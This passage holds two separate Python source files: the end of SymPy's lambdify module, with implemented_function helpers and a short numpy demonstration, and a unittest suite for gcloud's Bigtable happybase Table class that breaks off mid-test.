We need to search for functions in anything that can be thrown at
us - that is - anything that could be passed as `expr`. Examples
include sympy expressions, as well as tuples, lists and dicts that may
contain sympy expressions.
Parameters
----------
expr : object
Something passed to lambdify, that will generate valid code from
``str(expr)``.
namespace : None or mapping
Namespace to fill. None results in new empty dict
Returns
-------
namespace : dict
dict with keys of implemented function names within `expr` and
corresponding values being the numerical implementation of
function
Examples
========
>>> from sympy.abc import x
>>> from sympy.utilities.lambdify import implemented_function, _imp_namespace
>>> from sympy import Function
>>> f = implemented_function(Function('f'), lambda x: x+1)
>>> g = implemented_function(Function('g'), lambda x: x*10)
>>> namespace = _imp_namespace(f(g(x)))
>>> sorted(namespace.keys())
['f', 'g']
"""
# Delayed import to avoid circular imports
from sympy.core.function import FunctionClass
if namespace is None:
namespace = {}
# tuples, lists, dicts are valid expressions
if is_sequence(expr):
for arg in expr:
_imp_namespace(arg, namespace)
return namespace
elif isinstance(expr, dict):
for key, val in expr.items():
# functions can be in dictionary keys
_imp_namespace(key, namespace)
_imp_namespace(val, namespace)
return namespace
# sympy expressions may be Functions themselves
func = getattr(expr, 'func', None)
if isinstance(func, FunctionClass):
imp = getattr(func, '_imp_', None)
if imp is not None:
name = expr.func.__name__
if name in namespace and namespace[name] != imp:
raise ValueError('We found more than one '
'implementation with name '
'"%s"' % name)
namespace[name] = imp
# and / or they may take Functions as arguments
if hasattr(expr, 'args'):
for arg in expr.args:
_imp_namespace(arg, namespace)
return namespace
def implemented_function(symfunc, implementation):
""" Add numerical ``implementation`` to function ``symfunc``.
``symfunc`` can be an ``UndefinedFunction`` instance, or a name string.
In the latter case we create an ``UndefinedFunction`` instance with that
name.
Be aware that this is a quick workaround, not a general method to create
special symbolic functions. If you want to create a symbolic function to be
used by all the machinery of SymPy you should subclass the ``Function``
class.
Parameters
----------
symfunc : ``str`` or ``UndefinedFunction`` instance
If ``str``, then create new ``UndefinedFunction`` with this as
name. If `symfunc` is a sympy function, attach implementation to it.
implementation : callable
numerical implementation to be called by ``evalf()`` or ``lambdify``
Returns
-------
afunc : sympy.FunctionClass instance
function with attached implementation
Examples
========
>>> from sympy.abc import x
>>> from sympy.utilities.lambdify import lambdify, implemented_function
>>> from sympy import Function
>>> f = implemented_function(Function('f'), lambda x: x+1)
>>> lam_f = lambdify(x, f(x))
>>> lam_f(4)
5
"""
# Delayed import to avoid circular imports
from sympy.core.function import UndefinedFunction
# if name, create function to hold implementation
if isinstance(symfunc, string_types):
symfunc = UndefinedFunction(symfunc)
elif not isinstance(symfunc, UndefinedFunction):
raise ValueError('symfunc should be either a string or'
' an UndefinedFunction instance.')
# We need to attach as a method because symfunc will be a class
symfunc._imp_ = staticmethod(implementation)
return symfunc
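# --- Minimal demonstration sketch (illustrative only; assumes numpy is
# installed and importable via sympy.external.import_module). ---
# Shows how _import() populates a namespace with the translations defined
# above, and how lambdastr()/lambdify() build on that machinery.
if __name__ == "__main__":
    from sympy.abc import x
    _import("numpy")
    # After the call, NUMPY holds numpy's namespace plus the translated names,
    # e.g. the SymPy name "acos" now points at numpy.arccos, and "I" maps to
    # 1j via NUMPY_DEFAULT.
    print(NUMPY["acos"])                 # <ufunc 'arccos'>
    print(NUMPY["I"])                    # 1j
    # lambdastr() produces the source of the lambda that lambdify() evals:
    print(lambdastr(x, x**2 + 1))        # lambda x: (x**2 + 1)
    f = lambdify(x, x**2 + 1, modules="numpy")
    print(f(3))                          # 10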
|
|
# Copyright 2016 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest2
class Test_make_row(unittest2.TestCase):
def _callFUT(self, *args, **kwargs):
from gcloud.bigtable.happybase.table import make_row
return make_row(*args, **kwargs)
def test_it(self):
with self.assertRaises(NotImplementedError):
self._callFUT({}, False)
class Test_make_ordered_row(unittest2.TestCase):
def _callFUT(self, *args, **kwargs):
from gcloud.bigtable.happybase.table import make_ordered_row
return make_ordered_row(*args, **kwargs)
def test_it(self):
with self.assertRaises(NotImplementedError):
self._callFUT([], False)
class TestTable(unittest2.TestCase):
def _getTargetClass(self):
from gcloud.bigtable.happybase.table import Table
return Table
def _makeOne(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_constructor(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
name = 'table-name'
instance = object()
connection = _Connection(instance)
tables_constructed = []
def make_low_level_table(*args, **kwargs):
result = _MockLowLevelTable(*args, **kwargs)
tables_constructed.append(result)
return result
with _Monkey(MUT, _LowLevelTable=make_low_level_table):
table = self._makeOne(name, connection)
self.assertEqual(table.name, name)
self.assertEqual(table.connection, connection)
table_instance, = tables_constructed
self.assertEqual(table._low_level_table, table_instance)
self.assertEqual(table_instance.args, (name, instance))
self.assertEqual(table_instance.kwargs, {})
def test_constructor_null_connection(self):
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
self.assertEqual(table.name, name)
self.assertEqual(table.connection, connection)
self.assertEqual(table._low_level_table, None)
def test_families(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
table._low_level_table = _MockLowLevelTable()
# Mock the column families to be returned.
col_fam_name = 'fam'
gc_rule = object()
col_fam = _MockLowLevelColumnFamily(col_fam_name, gc_rule=gc_rule)
col_fams = {col_fam_name: col_fam}
table._low_level_table.column_families = col_fams
to_dict_result = object()
to_dict_calls = []
def mock_gc_rule_to_dict(gc_rule):
to_dict_calls.append(gc_rule)
return to_dict_result
with _Monkey(MUT, _gc_rule_to_dict=mock_gc_rule_to_dict):
result = table.families()
self.assertEqual(result, {col_fam_name: to_dict_result})
self.assertEqual(table._low_level_table.list_column_families_calls, 1)
self.assertEqual(to_dict_calls, [gc_rule])
def test___repr__(self):
name = 'table-name'
table = self._makeOne(name, None)
self.assertEqual(repr(table), '<table.Table name=\'table-name\'>')
def test_regions(self):
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
with self.assertRaises(NotImplementedError):
table.regions()
def test_row_empty_row(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
table._low_level_table = _MockLowLevelTable()
table._low_level_table.read_row_result = None
# Set-up mocks.
fake_filter = object()
mock_filters = []
def mock_filter_chain_helper(**kwargs):
mock_filters.append(kwargs)
return fake_filter
row_key = 'row-key'
timestamp = object()
with _Monkey(MUT, _filter_chain_helper=mock_filter_chain_helper):
result = table.row(row_key, timestamp=timestamp)
# read_row_result == None --> No results.
self.assertEqual(result, {})
read_row_args = (row_key,)
read_row_kwargs = {'filter_': fake_filter}
self.assertEqual(table._low_level_table.read_row_calls, [
(read_row_args, read_row_kwargs),
])
expected_kwargs = {
'filters': [],
'versions': 1,
'timestamp': timestamp,
}
self.assertEqual(mock_filters, [expected_kwargs])
def test_row_with_columns(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
table._low_level_table = _MockLowLevelTable()
table._low_level_table.read_row_result = None
# Set-up mocks.
fake_col_filter = object()
mock_columns = []
def mock_columns_filter_helper(*args):
mock_columns.append(args)
return fake_col_filter
fake_filter = object()
mock_filters = []
def mock_filter_chain_helper(**kwargs):
mock_filters.append(kwargs)
return fake_filter
row_key = 'row-key'
columns = object()
with _Monkey(MUT, _filter_chain_helper=mock_filter_chain_helper,
_columns_filter_helper=mock_columns_filter_helper):
result = table.row(row_key, columns=columns)
# read_row_result == None --> No results.
self.assertEqual(result, {})
read_row_args = (row_key,)
read_row_kwargs = {'filter_': fake_filter}
self.assertEqual(table._low_level_table.read_row_calls, [
(read_row_args, read_row_kwargs),
])
self.assertEqual(mock_columns, [(columns,)])
expected_kwargs = {
'filters': [fake_col_filter],
'versions': 1,
'timestamp': None,
}
self.assertEqual(mock_filters, [expected_kwargs])
def test_row_with_results(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
from gcloud.bigtable.row_data import PartialRowData
row_key = 'row-key'
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
table._low_level_table = _MockLowLevelTable()
partial_row = PartialRowData(row_key)
table._low_level_table.read_row_result = partial_row
# Set-up mocks.
fake_filter = object()
mock_filters = []
def mock_filter_chain_helper(**kwargs):
mock_filters.append(kwargs)
return fake_filter
fake_pair = object()
mock_cells = []
def mock_cells_to_pairs(*args, **kwargs):
mock_cells.append((args, kwargs))
return [fake_pair]
col_fam = u'cf1'
qual = b'qual'
fake_cells = object()
partial_row._cells = {col_fam: {qual: fake_cells}}
include_timestamp = object()
with _Monkey(MUT, _filter_chain_helper=mock_filter_chain_helper,
_cells_to_pairs=mock_cells_to_pairs):
result = table.row(row_key, include_timestamp=include_timestamp)
# The results come from _cells_to_pairs.
expected_result = {col_fam.encode('ascii') + b':' + qual: fake_pair}
self.assertEqual(result, expected_result)
read_row_args = (row_key,)
read_row_kwargs = {'filter_': fake_filter}
self.assertEqual(table._low_level_table.read_row_calls, [
(read_row_args, read_row_kwargs),
])
expected_kwargs = {
'filters': [],
'versions': 1,
'timestamp': None,
}
self.assertEqual(mock_filters, [expected_kwargs])
to_pairs_kwargs = {'include_timestamp': include_timestamp}
self.assertEqual(mock_cells,
[((fake_cells,), to_pairs_kwargs)])
def test_rows_empty_row(self):
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
result = table.rows([])
self.assertEqual(result, [])
def test_rows_with_columns(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
table._low_level_table = _MockLowLevelTable()
rr_result = _MockPartialRowsData()
table._low_level_table.read_rows_result = rr_result
self.assertEqual(rr_result.consume_all_calls, 0)
# Set-up mocks.
fake_col_filter = object()
mock_cols = []
def mock_columns_filter_helper(*args):
mock_cols.append(args)
return fake_col_filter
fake_rows_filter = object()
mock_rows = []
def mock_row_keys_filter_helper(*args):
mock_rows.append(args)
return fake_rows_filter
fake_filter = object()
mock_filters = []
def mock_filter_chain_helper(**kwargs):
mock_filters.append(kwargs)
return fake_filter
rows = ['row-key']
columns = object()
with _Monkey(MUT, _filter_chain_helper=mock_filter_chain_helper,
_row_keys_filter_helper=mock_row_keys_filter_helper,
_columns_filter_helper=mock_columns_filter_helper):
result = table.rows(rows, columns=columns)
# read_rows_result == Empty PartialRowsData --> No results.
self.assertEqual(result, [])
read_rows_args = ()
read_rows_kwargs = {'filter_': fake_filter}
self.assertEqual(table._low_level_table.read_rows_calls, [
(read_rows_args, read_rows_kwargs),
])
self.assertEqual(rr_result.consume_all_calls, 1)
self.assertEqual(mock_cols, [(columns,)])
self.assertEqual(mock_rows, [(rows,)])
expected_kwargs = {
'filters': [fake_col_filter, fake_rows_filter],
'versions': 1,
'timestamp': None,
}
self.assertEqual(mock_filters, [expected_kwargs])
def test_rows_with_results(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
from gcloud.bigtable.row_data import PartialRowData
row_key1 = 'row-key1'
row_key2 = 'row-key2'
rows = [row_key1, row_key2]
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
table._low_level_table = _MockLowLevelTable()
row1 = PartialRowData(row_key1)
# Return row1 but not row2
rr_result = _MockPartialRowsData(rows={row_key1: row1})
table._low_level_table.read_rows_result = rr_result
self.assertEqual(rr_result.consume_all_calls, 0)
# Set-up mocks.
fake_rows_filter = object()
mock_rows = []
def mock_row_keys_filter_helper(*args):
mock_rows.append(args)
return fake_rows_filter
fake_filter = object()
mock_filters = []
def mock_filter_chain_helper(**kwargs):
mock_filters.append(kwargs)
return fake_filter
fake_pair = object()
mock_cells = []
def mock_cells_to_pairs(*args, **kwargs):
mock_cells.append((args, kwargs))
return [fake_pair]
col_fam = u'cf1'
qual = b'qual'
fake_cells = object()
row1._cells = {col_fam: {qual: fake_cells}}
include_timestamp = object()
with _Monkey(MUT, _row_keys_filter_helper=mock_row_keys_filter_helper,
_filter_chain_helper=mock_filter_chain_helper,
_cells_to_pairs=mock_cells_to_pairs):
result = table.rows(rows, include_timestamp=include_timestamp)
# read_rows_result == PartialRowsData with row_key1
expected_result = {col_fam.encode('ascii') + b':' + qual: fake_pair}
self.assertEqual(result, [(row_key1, expected_result)])
read_rows_args = ()
read_rows_kwargs = {'filter_': fake_filter}
self.assertEqual(table._low_level_table.read_rows_calls, [
(read_rows_args, read_rows_kwargs),
])
self.assertEqual(rr_result.consume_all_calls, 1)
self.assertEqual(mock_rows, [(rows,)])
expected_kwargs = {
'filters': [fake_rows_filter],
'versions': 1,
'timestamp': None,
}
self.assertEqual(mock_filters, [expected_kwargs])
to_pairs_kwargs = {'include_timestamp': include_timestamp}
self.assertEqual(mock_cells,
[((fake_cells,), to_pairs_kwargs)])
def test_cells_empty_row(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
table._low_level_table = _MockLowLevelTable()
table._low_level_table.read_row_result = None
# Set-up mocks.
fake_filter = object()
mock_filters = []
def mock_filter_chain_helper(**kwargs):
mock_filters.append(kwargs)
return fake_filter
row_key = 'row-key'
column = 'fam:col1'
with _Monkey(MUT, _filter_chain_helper=mock_filter_chain_helper):
result = table.cells(row_key, column)
# read_row_result == None --> No results.
self.assertEqual(result, [])
read_row_args = (row_key,)
read_row_kwargs = {'filter_': fake_filter}
self.assertEqual(table._low_level_table.read_row_calls, [
(read_row_args, read_row_kwargs),
])
expected_kwargs = {
'column': column,
'versions': None,
'timestamp': None,
}
self.assertEqual(mock_filters, [expected_kwargs])
def test_cells_with_results(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
from gcloud.bigtable.row_data import PartialRowData
row_key = 'row-key'
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
table._low_level_table = _MockLowLevelTable()
partial_row = PartialRowData(row_key)
table._low_level_table.read_row_result = partial_row
# These are all passed to mocks.
versions = object()
timestamp = object()
include_timestamp = object()
# Set-up mocks.
fake_filter = object()
mock_filters = []
def mock_filter_chain_helper(**kwargs):
mock_filters.append(kwargs)
return fake_filter
fake_result = object()
mock_cells = []
def mock_cells_to_pairs(*args, **kwargs):
mock_cells.append((args, kwargs))
return fake_result
col_fam = 'cf1'
qual = 'qual'
fake_cells = object()
partial_row._cells = {col_fam: {qual: fake_cells}}
column = col_fam + ':' + qual
with _Monkey(MUT, _filter_chain_helper=mock_filter_chain_helper,
_cells_to_pairs=mock_cells_to_pairs):
result = table.cells(row_key, column, versions=versions,
timestamp=timestamp,
include_timestamp=include_timestamp)
self.assertEqual(result, fake_result)
read_row_args = (row_key,)
read_row_kwargs = {'filter_': fake_filter}
self.assertEqual(table._low_level_table.read_row_calls, [
(read_row_args, read_row_kwargs),
])
filter_kwargs = {
'column': column,
'versions': versions,
'timestamp': timestamp,
}
self.assertEqual(mock_filters, [filter_kwargs])
to_pairs_kwargs = {'include_timestamp': include_timestamp}
self.assertEqual(mock_cells,
[((fake_cells,), to_pairs_kwargs)])
def test_scan_with_batch_size(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
warned = []
def mock_warn(msg):
warned.append(msg)
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
# Use unknown to force a TypeError, so we don't need to
# stub out the rest of the method.
with self.assertRaises(TypeError):
with _Monkey(MUT, _WARN=mock_warn):
list(table.scan(batch_size=object(), unknown=None))
self.assertEqual(len(warned), 1)
self.assertIn('batch_size', warned[0])
def test_scan_with_scan_batching(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
warned = []
def mock_warn(msg):
warned.append(msg)
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
# Use unknown to force a TypeError, so we don't need to
# stub out the rest of the method.
with self.assertRaises(TypeError):
with _Monkey(MUT, _WARN=mock_warn):
list(table.scan(scan_batching=object(), unknown=None))
self.assertEqual(len(warned), 1)
self.assertIn('scan_batching', warned[0])
def test_scan_with_sorted_columns(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
warned = []
def mock_warn(msg):
warned.append(msg)
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
# Use unknown to force a TypeError, so we don't need to
# stub out the rest of the method.
with self.assertRaises(TypeError):
with _Monkey(MUT, _WARN=mock_warn):
list(table.scan(sorted_columns=object(), unknown=None))
self.assertEqual(len(warned), 1)
self.assertIn('sorted_columns', warned[0])
def test_scan_with_invalid_limit(self):
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
with self.assertRaises(ValueError):
list(table.scan(limit=-10))
def test_scan_with_row_prefix_and_row_start(self):
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
with self.assertRaises(ValueError):
list(table.scan(row_prefix='a', row_stop='abc'))
def test_scan_with_string_filter(self):
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
with self.assertRaises(TypeError):
list(table.scan(filter='some-string'))
def _scan_test_helper(self, row_limits=(None, None), row_prefix=None,
columns=None, filter_=None, timestamp=None,
include_timestamp=False, limit=None, rr_result=None,
expected_result=None):
import types
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
name = 'table-name'
row_start, row_stop = row_limits
connection = None
table = self._makeOne(name, connection)
table._low_level_table = _MockLowLevelTable()
rr_result = rr_result or _MockPartialRowsData()
table._low_level_table.read_rows_result = rr_result
self.assertEqual(rr_result.consume_next_calls, 0)
# Set-up mocks.
fake_col_filter = object()
mock_columns = []
def mock_columns_filter_helper(*args):
mock_columns.append(args)
return fake_col_filter
fake_filter = object()
mock_filters = []
def mock_filter_chain_helper(**kwargs):
mock_filters.append(kwargs)
return fake_filter
with _Monkey(MUT, _filter_chain_helper=mock_filter_chain_helper,
_columns_filter_helper=mock_columns_filter_helper):
result = table.scan(row_start=row_start, row_stop=row_stop,
row_prefix=row_prefix, columns=columns,
filter=filter_, timestamp=timestamp,
include_timestamp=include_timestamp,
limit=limit)
self.assertTrue(isinstance(result, types.GeneratorType))
# Need to consume the result while the monkey patch is applied.
# read_rows_result == Empty PartialRowsData --> No results.
expected_result = expected_result or []
self.assertEqual(list(result), expected_result)
read_rows_args = ()
if row_prefix:
row_start = row_prefix
row_stop = MUT._string_successor(row_prefix)
read_rows_kwargs = {
'end_key': row_stop,
'filter_': fake_filter,
'limit': limit,
'start_key': row_start,
}
self.assertEqual(table._low_level_table.read_rows_calls, [
(read_rows_args, read_rows_kwargs),
])
self.assertEqual(rr_result.consume_next_calls,
rr_result.iterations + 1)
if columns is not None:
self.assertEqual(mock_columns, [(columns,)])
else:
self.assertEqual(mock_columns, [])
filters = []
if filter_ is not None:
filters.append(filter_)
if columns:
filters.append(fake_col_filter)
expected_kwargs = {
'filters': filters,
'versions': 1,
'timestamp': timestamp,
}
self.assertEqual(mock_filters, [expected_kwargs])
def test_scan_with_columns(self):
columns = object()
self._scan_test_helper(columns=columns)
def test_scan_with_row_start_and_stop(self):
row_start = 'bar'
row_stop = 'foo'
row_limits = (row_start, row_stop)
self._scan_test_helper(row_limits=row_limits)
def test_scan_with_row_prefix(self):
row_prefix = 'row-prefi'
self._scan_test_helper(row_prefix=row_prefix)
def test_scan_with_filter(self):
mock_filter = object()
self._scan_test_helper(filter_=mock_filter)
def test_scan_with_no_results(self):
limit = 1337
timestamp = object()
self._scan_test_helper(timestamp=timestamp, limit=limit)
def test_scan_with_results(self):
from gcloud.bigtable.row_data import PartialRowData
row_key1 = 'row-key1'
row1 = PartialRowData(row_key1)
rr_result = _MockPartialRowsData(rows={row_key1: row1}, iterations=1)
include_timestamp = object()
expected_result = [(row_key1, {})]
self._scan_test_helper(include_timestamp=include_timestamp,
rr_result=rr_result,
expected_result=expected_result)
def test_put(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
from gcloud.bigtable.happybase.table import _WAL_SENTINEL
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
batches_created = []
def make_batch(*args, **kwargs):
result = _MockBatch(*args, **kwargs)
batches_created.append(result)
return result
row = 'row-key'
data = {'fam:col': 'foo'}
timestamp = None
with _Monkey(MUT, Batch=make_batch):
result = table.put(row, data, timestamp=timestamp)
# There is no return value.
self.assertEqual(result, None)
# Check how the batch was created and used.
batch, = batches_created
self.assertTrue(isinstance(batch, _MockBatch))
self.assertEqual(batch.args, (table,))
expected_kwargs = {
'timestamp': timestamp,
'batch_size': None,
'transaction': False,
'wal': _WAL_SENTINEL,
}
self.assertEqual(batch.kwargs, expected_kwargs)
# Make sure it was a successful context manager
self.assertEqual(batch.exit_vals, [(None, None, None)])
self.assertEqual(batch.put_args, [(row, data)])
self.assertEqual(batch.delete_args, [])
def test_delete(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
from gcloud.bigtable.happybase.table import _WAL_SENTINEL
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
batches_created = []
def make_batch(*args, **kwargs):
result = _MockBatch(*args, **kwargs)
batches_created.append(result)
return result
row = 'row-key'
columns = ['fam:col1', 'fam:col2']
timestamp = None
with _Monkey(MUT, Batch=make_batch):
result = table.delete(row, columns=columns, timestamp=timestamp)
# There is no return value.
self.assertEqual(result, None)
# Check how the batch was created and used.
batch, = batches_created
self.assertTrue(isinstance(batch, _MockBatch))
self.assertEqual(batch.args, (table,))
expected_kwargs = {
'timestamp': timestamp,
'batch_size': None,
'transaction': False,
'wal': _WAL_SENTINEL,
}
self.assertEqual(batch.kwargs, expected_kwargs)
# Make sure it was a successful context manager
self.assertEqual(batch.exit_vals, [(None, None, None)])
self.assertEqual(batch.put_args, [])
self.assertEqual(batch.delete_args, [(row, columns)])
def test_batch(self):
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
timestamp = object()
batch_size = 42
transaction = False # Must be False when batch_size is non-null
wal = object()
with _Monkey(MUT, Batch=_MockBatch):
result = table.batch(timestamp=timestamp, batch_size=batch_size,
transaction=transaction, wal=wal)
self.assertTrue(isinstance(result, _MockBatch))
self.assertEqual(result.args, (table,))
expected_kwargs = {
'timestamp': timestamp,
'batch_size': batch_size,
'transaction': transaction,
'wal': wal,
}
self.assertEqual(result.kwargs, expected_kwargs)
def test_counter_get(self):
klass = self._getTargetClass()
counter_value = 1337
class TableWithInc(klass):
incremented = []
value = counter_value
def counter_inc(self, row, column, value=1):
self.incremented.append((row, column, value))
self.value += value
return self.value
name = 'table-name'
connection = None
table = TableWithInc(name, connection)
row = 'row-key'
column = 'fam:col1'
self.assertEqual(TableWithInc.incremented, [])
result = table.counter_get(row, column)
self.assertEqual(result, counter_value)
self.assertEqual(TableWithInc.incremented, [(row, column, 0)])
def test_counter_dec(self):
klass = self._getTargetClass()
counter_value = 42
class TableWithInc(klass):
incremented = []
value = counter_value
def counter_inc(self, row, column, value=1):
self.incremented.append((row, column, value))
self.value += value
return self.value
name = 'table-name'
connection = None
table = TableWithInc(name, connection)
row = 'row-key'
column = 'fam:col1'
dec_value = 987
self.assertEqual(TableWithInc.incremented, [])
result = table.counter_dec(row, column, value=dec_value)
self.assertEqual(result, counter_value - dec_value)
self.assertEqual(TableWithInc.incremented, [(row, column, -dec_value)])
def _counter_inc_helper(self, row, column, value, commit_result):
import six
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
# Mock the return values.
table._low_level_table = _MockLowLevelTable()
table._low_level_table.row_values[row] = row_obj = _MockLowLevelRow(
row, commit_result=commit_result)
self.assertFalse(row_obj._append)
result = table.counter_inc(row, column, value=value)
self.assertTrue(row_obj._append)
incremented_value = value + _MockLowLevelRow.COUNTER_DEFAULT
self.assertEqual(result, incremented_value)
# Check the row values returned.
row_obj = table._low_level_table.row_values[row]
if isinstance(column, six.binary_type):
column = column.decode('utf-8')
self.assertEqual(row_obj.counts,
{tuple(column.split(':')): incremented_value})
def test_counter_set(self):
import struct
from gcloud._testing import _Monkey
from gcloud.bigtable.happybase import table as MUT
name = 'table-name'
connection = None
table = self._makeOne(name, connection)
batches_created = []
def make_batch(*args, **kwargs):
result = _MockBatch(*args, **kwargs)
batches_created.append(result)
return result
row = 'row-key'
column = 'fam:col1'
value = 42
with _Monkey(MUT, Batch=make_batch):
result = table.counter_set(row, column, value=value)
# There is no return value.
self.assertEqual(result, None)
# Check how the batch was created and used.
batch, = batches_created
self.assertTrue(isinstance(batch, _MockBatch))
self.assertEqual(batch.args, (table,))
expected_kwargs = {
'timestamp': None,
'batch_size': None,
'transaction': False,
'wal': MUT._WAL_SENTINEL,
}
self.assertEqual(batch.kwargs, expected_kwargs)
# Make sure it was a successful context manager
self.assertEqual(batch.exit_vals, [(None, None, None)])
data = {column: struct.Struct('>q').pack(value)}
self.assertEqual(batch.put_args, [(row, data)])
self.assertEqual(batch.delete_args, [])
def test_counter_inc(self):
import struct
row = 'row-key'
col_fam = u'fam'
col_qual = u'col1'
column = col_fam + u':' + col_qual
value = 42
packed_value = struct.pack('>q', value)
fake_timestamp = None
commit_result = {
col_fam: {
col_qual: [(packed_value, fake_timestamp)],
}
}
self._counter_inc_helper(row, column, value, commit_result)
def test_counter_inc_column_bytes(self):
import struct
row = 'row-key'
col_fam = b'fam'
col_qual = b'col1'
column = col_fam + b':' + col_qual
value = 42
packed_value = struct.pack('>q', value)
fake_timestamp = None
commit_result = {
col_fam.decode('utf-8'): {
col_qual.decode('utf-8'): [(packed_value, fake_timestamp)],
}
}
self._counter_inc_helper(row, column, value, commit_result)
def test_counter_inc_bad_result(self):
row = 'row-key'
col_fam = 'fam'
col_qual = 'col1'
column = col_fam + ':' + col_qual
value = 42
commit_result = None
with self.assertRaises(TypeError):
self._counter_inc_helper(row, column, value, commit_result)
def test_counter_inc_result_key_error(self):
row = 'row-key'
col_fam = 'fam'
col_qual = 'col1'
column = col_fam + ':' + col_qual
value = 42
commit_result = {}
with self.assertRaises(KeyError):
self._counter_inc_helper(row, column, value, commit_result)
def test_counter_inc_result_nested_key_error(self):
row = 'row-key'
col_fam = 'fam'
col_qual = 'col1'
column = col_fam + ':' + col_qual
value = 42
commit_result = {col_fam: {}}
with self.assertRaises(KeyError):
self._counter_inc_helper(row, column, value, commit_result)
def test_counter_inc_result_non_unique_cell(self):
row = 'row-key'
col_fam = 'fam'
col_qual = 'col1'
column = col_fam + ':' + col_qual
value = 42
fake_timestamp = None
packed_value = None
commit_result = {
col_fam: {
col_qual: [
(packed_value, fake_timestamp),
(packed_value, fake_timestamp),
],
}
}
with self.assertRaises(ValueError):
self._counter_inc_helper(row, column, value, commit_result)
class Test__gc_rule_to_dict(unittest2.TestCase):
def _callFUT(self, *args, **kwargs):
from gcloud.bigtable.happybase.table import _gc_rule_to_dict
return _gc_rule_to_dict(*args, **kwargs)
def test_with_null(self):
gc_rule = None
result = self._callFUT(gc_rule)
self.assertEqual(result, {})
def test_with_max_versions(self):
from gcloud.bigtable.column_family import MaxVersionsGCRule
max_versions = 2
gc_rule = MaxVersionsGCRule(max_versions)
result = self._callFUT(gc_rule)
expected_result = {'max_versions': max_versions}
self.assertEqual(result, expected_result)
def test_with_max_age(self):
import datetime
from gcloud.bigtable.column_family import MaxAgeGCRule
time_to_live = 101
max_age = datetime.timedelta(seconds=time_to_live)
gc_rule = MaxAgeGCRule(max_age)
result = self._callFUT(gc_rule)
expected_result = {'time_to_live': time_to_live}
self.assertEqual(result, expected_result)
def test_with_non_gc_rule(self):
gc_rule = object()
result = self._callFUT(gc_rule)
self.assertTrue(result is gc_rule)
def test_with_gc_rule_union(self):
from gcloud.bigtable.column_family import GCRuleUnion
gc_rule = GCRuleUnion(rules=[])
result = self._callFUT(gc_rule)
self.assertTrue(result is gc_rule)
def test_with_intersection_other_than_two(self):
from gcloud.bigtable.column_family import GCRuleIntersection
gc_rule = GCRuleIntersection(rules=[])
result = self._callFUT(gc_rule)
self.assertTrue(result is gc_rule)
def test_with_intersection_two_max_num_versions(self):
from gcloud.bigtable.column_family import GCRuleIntersection
from gcloud.bigtable.column_family import MaxVersionsGCRule
rule1 = MaxVersionsGCRule(1)
rule2 = MaxVersionsGCRule(2)
gc_rule = GCRuleIntersection(rules=[rule1, rule2])
result = self._callFUT(gc_rule)
self.assertTrue(result is gc_rule)
def test_with_intersection_two_rules(self):
import datetime
from gcloud.bigtable.column_family import GCRuleIntersection
from gcloud.bigtable.column_family import MaxAgeGCRule
from gcloud.bigtable.column_family import MaxVersionsGCRule
time_to_live = 101
max_age = datetime.timedelta(seconds=time_to_live)
rule1 = MaxAgeGCRule(max_age)
max_versions = 2
rule2 = MaxVersionsGCRule(max_versions)
gc_rule = GCRuleIntersection(rules=[rule1, rule2])
result = self._callFUT(gc_rule)
expected_result = {
'max_versions': max_versions,
'time_to_live': time_to_live,
}
self.assertEqual(result, expected_result)
def test_with_intersection_two_nested_rules(self):
from gcloud.bigtable.column_family import GCRuleIntersection
rule1 = GCRuleIntersection(rules=[])
rule2 = GCRuleIntersection(rules=[])
gc_rule = GCRuleIntersection(rules=[rule1, rule2])
result = self._callFUT(gc_rule)
self.assertTrue(result is gc_rule)
class Test__string_successor(unittest2.TestCase):
def _callFUT(self, *args, **kwargs):
from gcloud.bigtable.happybase.table import _string_successor
return _string_successor(*args, **kwargs)
def test_with_alphanumeric(self):
self.assertEqual(self._callFUT(b'boa'), b'bob')
self.assertEqual(self._callFUT(b'abc1'), b'abc2')
def test_with_last_byte(self):
